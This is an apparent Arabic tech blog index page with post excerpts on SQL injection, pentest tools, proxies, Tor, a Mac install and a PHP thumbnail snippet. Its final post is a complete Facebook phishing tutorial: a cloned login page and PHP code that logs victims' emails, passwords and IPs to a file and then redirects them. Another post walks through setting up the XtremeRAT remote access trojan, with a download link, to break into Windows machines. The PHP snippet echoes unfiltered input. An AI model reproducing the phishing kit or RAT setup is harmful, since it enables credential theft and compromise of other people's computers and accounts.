شرح أختراق المواقع بثغرة Sql Injection بشكل يدوي بدون اي برامج

اليوم سأشرح أختراق المواقع بثغرة Sql Injection بشكل يدوي بدون اي برامج ، كما تعلمون ثغرات الـ Sql Injection من أخطر ثغرات الويب الموجودة حالياً وهي تنتج من خلال عدم فلترة المدخلات والتأكد منها أثناء تنفيذ الاستعلام

ويتم استغلالها بحقن أكواد وإستعلامات خاصة بقواعد البيانات لاستخراج البيانات من القاعدة اما عن طريق الحقن اليدوي الذي ستشاهدونه الآن أو عن طريق البرامج مثل برنامج havij على الويندوز الذي قام بشرحه الاخ عميد وبرنامج sqlmap على اللينكس

قمت بأستخدام اضافة Hackbar على متصفح الفايرفوكس لتوضيح الرابط فقط يمكن تطبيق الشرح بدونها استعملتها فقط للتوضيح ، قمت بالتطبيق على موقع vulnweb.com المخصص للأختبارات والتجارب .

* ملاحظة : الشرح للأغراض العلمية فقط وللعلم بالشيء :)

تابع القراءة Unknown

Ubuntu Edge هل سيرى النور؟

قبل شهر أعلن مارك شتلورث مؤسس مشروع أوبنتو والمدير التنفيذي لشركة كانونيكال الراعية له عن هاتف ذكي جديد بمواصفات خارقة تضاهي مواصفات حاسب مكتبي متوسط المواصفات, حيث تبلغ سعة الذاكرة العشوائية 4 جيجا بايت والمساحة التخزينية 128 جيجا بايت  ويعمل الهاتف بنظامين هما أوبنتو و أندرويد . كما يدعم شبكات الجيل الرابع ومصنوع من الألمنيوم المقاوم للخدش.

بدأت شركة كانونيكال بجمع التبرعات منذ اليوم الأول للإعلان عن الهاتف وبلغت التبرعات حتى اللحظة $10,364,496 دولار أمريكي وتسعى كانونيكال لبلوغ 32 مليون دولار للبدء بالإنتاج.

كانت لكانونيكال محاولات سابقة لدخول أسواق جديدة آخرها كان مشروع أوبنتو تي في الذي لم يلقى أي نجاح يذكر ويشكك البعض في إمكانية نجاح الشركة في مجال الهواتف الذكية وذلك نظراً لسيطرة عمالقة مثل قوقل ومايكروسوفت عليه رغم كل المواصفات المغرية.

تابع القراءة Unknown

اهم الأدوات و البرامج التي استخدمها في اختبار الاختراق

بسم الله الرحمن الرحيم

الأدوات والبرامج في عملية أختبار الاختراق مهمة جداً مهما كان الشخص محترف ﻻ بد أن يكون لديه اعتماد كبير على الأدوات لأنها تساعد بشكل كبير في جميع مراحل عملية أختبار الاختراق سأركز على الأدوات الأكثر أهمية أو التي اعتمد عليها بشكل كبير.

 مشروع Metasploit

مشروع ميتاسبلويت الغني عن التعريف يحتوي على مجموعة كبيرة من الثغرات والأدوات التي تساعد بشكل كبير مختبر الاختراق على انجاز عمله .

أداة Umit

هي أداة لفحص الشبكات وهي عبارة عن واجهة رسومية لـNmap وهي مفتوحة المصدر و مبرمجة بلغة Python وهي قادرة على فحص نطاق  الشبكة كامل ومعرفة نظام التشغيل وفحص الأجهزة الموجودة فيها وفحص المنافذ والخدمات التي تكون قيد التشغيل والكثير من الخيارات المتقدمة والمعروف عن برنامج Nmap الذي تعتمد عليه الأداة انه من أقوى البرامج التي يستخدمها الهاكرز ومختبرين الاختراق لفحص الشبكات .

برنامج Maltego

هو أحدى أفضل برامج جمع المعلومات عن الهدف Information Gathering البرنامج لديه قدرة كبيرة على جمع المعلومات عن هدف معين كـ شخص او موقع او شركة او اي هدف آخر بواسطة اي معلومة توجد لديك عن هذا الهدف كـ IP او Email او اسم شخص او رابط موقع او كلمة معينة ويعرض لك المعلومات بشكل منسق يساعدك على تحليلها كما يتيح لك ربط المعلومات ببعضها البعض لعمل سيرة شاملة عن الهدف وهذا النوع من البرامج يسهل مرحلة جمع المعلومات بدل أستخدام قوقل او برامج اقل فعالية ومرحلة جمع المعلومات هي اول مرحلة بالنسبة للـ Penetration Test

أداة Burp Suite

الأداة عبارة عن مجموعه أدوات اسمها BurbSuite من برمجة portswigger مبرمجة بالـ Java
الأدوات الموجودة تفيد بأمور كثيرة مثل فحص و اختبار تطبيقات الويب ومهاجمتها تجعل جهازك سيرفر بروكسي يمكنك من مشاهدة جميع البيانات المارة من جهازك إلى الموقع وبالعكس والزحف في المواقع وإظهار الصفحات الموجودة والمواقع المرتبطة به و مهاجمة تطبيقات الويب واختبارها واكتشاف أماكن الضعف التي قد تسبب فلوود على الموقع و إرسال طلبات مخصصة للسيرفر و أدوات مساعدة تعمل على تشفير وفك تشفير النصوص .

أداة sqlmap

تعد من أفضل الأدوات في استغلال ثغرات SQL بجميع أنواعها وتتمتع بخيارات قوية و المعروف أن ثغرات الـ Sql Injection من أخطر ثغرات الويب في الوقت الحالي ، الاداة مبرمجة بلغة الـ Python ومفتوحة المصدر ، شبيهة بأداة havij على الويندوز

أدوات Aircrack-ng

مجموعة من الأدوات تستخدم في فك تشفير الشبكات اللاسلكية بنوعيها wep & wap-psk و عمل هجمات كثيرة على الشبكات من خلال هذه الأدوات

أداة Weevely

هي اداة  تساعد على إنشاء اتصالات عكسية مع السيرفر والتحكم فيه عن طريق بعض الملفات التي تقوم بإنشاء الاتصال العكسي بين العميل والسيرفر لأرسال الاوامر من خلاله وهي مبرمجة بلغة Python ومفتوحة المصدر

 * هذه الأدوات بالإضافة إلى بعض الأدوات التي أقوم ببرمجتها بالـ PHP و Python التي تلبي الغرض وتكون بشكل بسيط تلبي حاجتي فقط .

تابع القراءة Unknown

إختراق المواقع ببرنامج Havij لإستغلال ثغرات SQL injection

سأشرح اليوم بإذن الله طريقة إستغلال ثغرات SQL Injection أهم الثغرات على الويب بشكل عام , وأشهرها ..

لها أكثر من إستغلال بداية من اليدوي وحتى البرامج بإختلاف انواعها وأسماءها

سأشرح بإذن الله برنامج سهل وبطريقة سلسة جداً , وهو برنامج الهافيج أو Havij

أولاً قبل الشرح :

تحميل برنامج الهافيج : V1.15

الشرح :

* ملاحظة : إني بريء براءة الذئب من دم يوسف من أي إستخدام خاطيء او إيذاء للمسلمين بهذا الشرح .

تابع القراءة Unknown

دورة إختراق الأجهزة | المرحلة الأولى

دورة إختراق الأجهزة على دايجست

سنبدأ بإذن الله بشرح طرق و أساليب إختراق الأجهزة طبعاً لنظام الويندوز فقط .سنشرح على مراحل

المرحلة الأولى : وتشمل كل التجهيزات الأساسية و الشرح الكامل للإختراق بالطريقة التقليدية بدون أي إضافات أو تشفير أو أي حيلة ما .

* ملاحظة : تم شرح هذه المرحلة على برنامج Xtream Rat لإختراق الأجهزة سنشرح فيما بعد بعض البرامج وأهمها لكن فضلت الإكستريم لأنه انا من معجبين هذا البرنامج ، سأشرح في القادم بإذن الله عده برامج على رأسها الكبير : البيفورست .

ملخص نصي لما تحتويه المرحلة الأولى :

* شرح فتح البورت .

* شرح التسجيل في النو آي بي .

* شرح تنصيب برنامج النو آي بي .

* شرح إنشاء سيرفر ببرنامج الإكستريم .

الشرح :

الروابط المرفقة للشرح :

أولاً : موقع دليل فتح البورت :

http://portforward.com/english/routers/port_forwarding/routerindex.htm

ثانياً : رابط موقع النو آي بي :

http://www.noip.com

ثالثاً : رابط برنامج الإكستريم لإختراق الأجهزة :

http://www.mediafire.com/download/5cffbllb2cy6mi7/XtremeRAT_3.6.rar

* ملاحظة : عند فتح البورت يجب ان تضعه في البرنامج من خلال النقر على عدد البورتات بأسفل البرنامج كما في الصورة وإضافة رقم البورت الذي فتحته .

تمت المرحلة الأولى بحمد الله

ملاحظة : المراحل القادمة ستكون إحترافية أكثر من هذه المرحلة , لان هذه المرحلة هي مرحلة إبتدائية , وأساسيات الإختراق , إنتظروني في الدروس القادمة

ثمن الدورة : دعوة صادقة :)

* ملاحظة : أنا بريء براءة الذئب من دم يوسف من من يستخدم هذه الدروس في ما يغضب الله .

تابع القراءة Unknown

تخطي الحجب وفتح المواقع المحجوبة يدوياً وبدون برامج

بسم الله الرحمن الرحيم

سبق و أن تم شرح تخطي الحجب على نظام الويندوز والماك واللينكس , ببرنامج تور

أما الآن فسأشرح طريقة تخطي الحجب وفتح المواقع المحجوبة بطريقة سهلة ويدوية وسريعه لمن لا يهمه أمر التخفي بشده ولكن يريد تخطي حجب موقع ما .

مع الملاحظة بالإمكان التخفي ايضاً بهذه الطريقة .

الطريقة قمة في السهولة لذلك سأشرحها بالصور وسأشرحها على متصفح الموزيلا فايرفوكس

بسم الله ..

ندخل موقع البروكسيات التالي :

http://www.ip-adress.com/sitemap/

في آخر الصفحة , ستجد كما هو محدد عليه أعلاه , أنقر عليها لدخول صفحة البروكسيات

بعد الدخول إلى الصفحة , سيظهر أمامك مجموعه ضخمه ومتجددة من البروكسيات العالمية , من كل البلدان وتتجدد بشكل مستمر و رائع .

إختر أحدها , أنا أخترت هذا البروكسي كمثال .

المحدد هو الآي بي

وما بعد الـ : هو البورت

أفتح المتصفح الخاص بك , وسأطبق أنا على الموزيلا فايرفوكس

ثم ادخل على صفحة الإعدادات | Options

Network > Settings

الشبكة > الإعدادات

حسب الإعدادات في الصورة , إملأ الخانة

HTTP Proxy

بالآي بي من موقع البروكسي مسبقاً , والذي إخترناه أعلاه

Port

هو رقم البورت الذي ما بعد الـ :

هذا كل ما لدي , طريقة سهلة وسريعه

إعذروني إن أطلت

* أبريء نفسي أمام الله من أي إستخدام غير شرعي للشرح .

تابع القراءة Unknown

برنامج Tor لتشفير الاتصال بالانترنت وتخطي الحجب

اليوم سأقدم شرح لتنصيب برنامج Tor وتشغيله طبعاً البرنامج يقوم بتشفير الاتصال بالانترنت وتخطي الحجب وهو مفيد جداً في حماية خصوصية المستخدم في تصفح الأنترنت والبرنامج متوافر لجميع أنظمة التشغيل لينكس و ويندوز والماك والهواتف الذكية Android , Nokia يمكنك تحميله من هـنـا

سأقوم بشرحه على اللينكس والاخ عميد بدر قام بشرحه بالفيديو للماك والويندوز .

 اولاً نقوم بتنصيب البرنامج عن طريق الـ Terminal

sudo apt-get install tor

ثم نقوم بتشغل البرنامج على الـ Terminal

sudo service tor start

start : لتشغيل البرنامج
stop : لايقاف البرنامج
restart : لإعادة تشغيل البرنامج

الان بقي ضبط البروكسي في المتصفح
اولاً ندخل من قائمة
Edit >> Preferences
ثم من قائمة Advanced تبويب Network

 

ثم نقوم بضبط الاعدادات كما في الصورة

الآن سندخل على صفحة التحقق من تشغيل البرنامج من موقع المشروع على الرابط التالي

Are you using Tor?

سيظهر لك
Congratulations. Your browser is configured to use Tor.

كما في الصورة التالية

* قام الأخ عميد بدر بشرح البرنامج بالفيديو لمستخدمين الماك والويندوز

شرح الـ Tor للماك

شرح الـ Tor للويندوز

* أنا ابرىء نفسي امام الله من اي استخدام غير شرعي للبرنامج

تابع القراءة Unknown

تنصيب Mac Mountain Lion على أجهزة الماك - الجزء الأول

بسم الله الرحمن الرحيم .

بعد التحية ...

أقدم لكم شرح كامل ومبسط لتنصيب الماكنتوش بشكل عام و نسخة الأسد الجبلي بشكل خاص على أجهزة الماك بوك فقط .

أي أن الشرح فقط لمن يملك أجهزة الماك بشكل عام , لأن تنصيب الماكنتوش على الأجهزة العادية أو التي تستخدم نظام الويندوز يختلف تماماً .

سأشرح التنصيب بإستخدام الفلاش , وذلك للسرعه و لإستغناء أبل في بعض الأجهزة عن السيدي روم .

سأقسم الشرح على مرحلتين بإذن الله .

المرحلة الأولى : تجهيز الفلاش بالنظام .

المرحلة الثانية : تنصيب النظام من الفلاش .

قبل البدء هناك بعض الملاحظات يجب أن أضيفها ..

أولاً نظام الأسد الجبلي Mountain Lion يدعم فقط :

(iMac (Mid 2007 or newer -
(MacBook (Late 2008 Aluminum, or Early 2009 or newer -
(MacBook Pro (Mid/Late 2007 or newer -
(Xserve (Early 2009 -
(MacBook Air (Late 2008 or newer -
(Mac mini , Pro (Early 2009 or newer -

عموماً بالإمكان معرفة موديل جهازك بالضغط على شعار أبل في الشريط العلوي و النقر على : About this Mac

نظام الأسد الجبلي Mountain Lion بالإمكان شراءه من الابل ستور بشكل رسمي

أو بالإمكان تحميله مكرك من أي مواقع التورنت

أو : بالإمكان إذا كنت تمتلك جهاز موديل ٢٠١٢ بالإمكان تحميله مجاناً من الأبل ستور .

- يحتاج تثبيت النظام إلى : رام / ما لا يقل عن 2GB

                             : مساحة / ما لا يقل عن 8GB

نبدأ الشرح :

المرحلة الأولى :-

تجهيز الفلاش بالنظام

أولاً نقوم بتحميل نسخة الأسد الجبلي , من أحد المصادر التي ذكرتها في الأعلى .

هنا حصلت عليه مجاناً من الأبل ستور لأني أمتلك ماك بوك برو ٢٠١٢

بعد تحميل النسخة نحصل على هذه الأيقونه في مجلد Application

ملاحظة : حجم النسخة 4.4 GB

ندخل على تبويب Go في الشريط العلوي

ومن ثم Utilities

ومن ثم : Disk Utility

في التبويب Erase

نفرمت الفلاش على الإعدادات الموجودة في الصورة

ننقر بالزر الأيمن على أيقونة النظام الذي تم تحميله , ونختار Show Package Contents .

ندخل المسار التالي : Contents/SharedSupport/

بالسحب والإسقاط نسحب الملف InstallESD.dmg على المكان الموجود في الصورة في Disk Utility .

ندخل على التبويب , Restore و بالسحب والإسقاط كما بالصورة

أيضاً بالسحب والإسقاط .

ومن ثم أنقر ريستور وتأكد من أن الإعدادات كما بالصورة أعلاه .

لتأكيد الريستور

يحتاج بعض الوقت , إنتظر ...

تم تجهيز الفلاش بشكل كامل للتنصيب منه والإقلاع منه .

الشرح بالفيديو :

انتهت المرحلة الأولى بحمد الله .

تابع القراءة Unknown

عمل صورة عن المواقع بـPagePeeker

اليوم اقدم لكم شرح كيف تقوم بعمل صورة عن المواقع اي انك تضع الرابط و يعطيك صورة عن شكل الموقع…

و سوف نقوم بعمل ذلك بطريقة سهلة للغاية عن طريق Api موقع PagePeeker

نبدأ علي بركة الله :

نقوم بعمل ملف create.php

و نكتب كود فورم رابط الموقع المطلوب صورة عنة:

<?
echo'
<form action="image.php" method="post" name="image" target="_self">
<input name="url" type="url" />
<input name="submit" type="submit" value="submit" />
&nbsp;
</form>';
?>

نتيجة create.php

ثم نقوم بعمل ملف المستهدف اي ملف استدعاء الصورة:
ملف image.php
ونكتب كود التالي:

<?
$url = $_POST["url"];
if ($url == '' ) {
echo'<center>يجب ان تضع رابط الموقع</center>';
}
else
$img = "<a href='".$url."' title='".$url."'><img src='http://free.pagepeeker.com/v2/thumbs.php?size=x&url=".$url."' border='0' /></a>";
echo $img
?>

و اضافة احببت ان اضيفها , ان عندما لا تكتب رابط اي تضغط ارسال بدون كتابة شئ يظهر لك:

عند عدم كتابة الرابط

و النتيجة عند كتابة رابط دايجست 3>

دايجست

تابع القراءة Unknown

شرح برمجة الصفحات المزورة في الـ PHP

اليوم سأقوم بشرح برمجة الصفحات المزورة في لغة الـ PHP وسأقوم بالتطبيق على صفحة دخول موقع الفيسبوك يمكن تطبيق الشرح على اي موقع آخر بمجرد معرفتك للأساسيات

أولاً سنقوم بإنشاء 3 ملفات
facebook.html
login.php
accounts.txt يحتاج إلى تصريح 777 ليتم الكتابة عليه

ثم نقوم بالدخول لصفحة الفيسبوك ونفتح مصدر الصفحة

الآن سنقوم بنسخ مصدر الصفحة كاملاً ونحفظه في ملف facebook.html
و سنعدل الـ action الخاص بنموذج الدخول login_form

<form id="login_form" action="https://www.facebook.com/login.php?login_attempt=1"

إلى

<form id="login_form" action="login.php"

ونأخذ اسم حقل اليوزر والباسوورد من فورم الدخول

name="pass"

name="email"

والآن سننشىء ملف login.php

<?php

$email = $_POST['email'];

$password = $_POST['pass'];

$ip = $_SERVER['REMOTE_ADDR'];

$date = date("l:d:m:Y");

$time = date("h:i:s");

$data = " Email : $email \n Password : $password \n IP Address: $ip \n Date: $date \n Time: $time \n ########################################################### \n";

$file = "accounts.txt";

$x = fopen ($file,"a");

fwrite  ($x,$data);

fclose($x);

header('location:https://www.facebook.com/');

?>

في بداية الملف قمنا بتمرير المدخلات email , pass عبر الـ post
ووضعنا متغير يحتوي على دالة لجلب الـ ip
وثم متغير للتاريخ ومتغير للوقت باستخدام دالة date
وثم متغير $data نضع فيه ما نريد طباعته على الملف النصي
ومتغير $file وضعت فيه اسم الملف النصي الذي سيتم الكتابة عليه
ثم قمنا بفتح الملف والكتابة عليه ومن ثم اغلاق الملف
وأخيراً استعملنا header للتحويل إلى الفيس بوك بعد ما قمنا بالكتابة على الملف جميع البيانات

النتيجة :)

* ملاحضة : الشرح للأغراض العلمية ولتوضيح الفكرة فقط وﻻ اشجع باستخدام ما ذكر في الشرح بأمور غير شرعية

تابع القراءة Unknown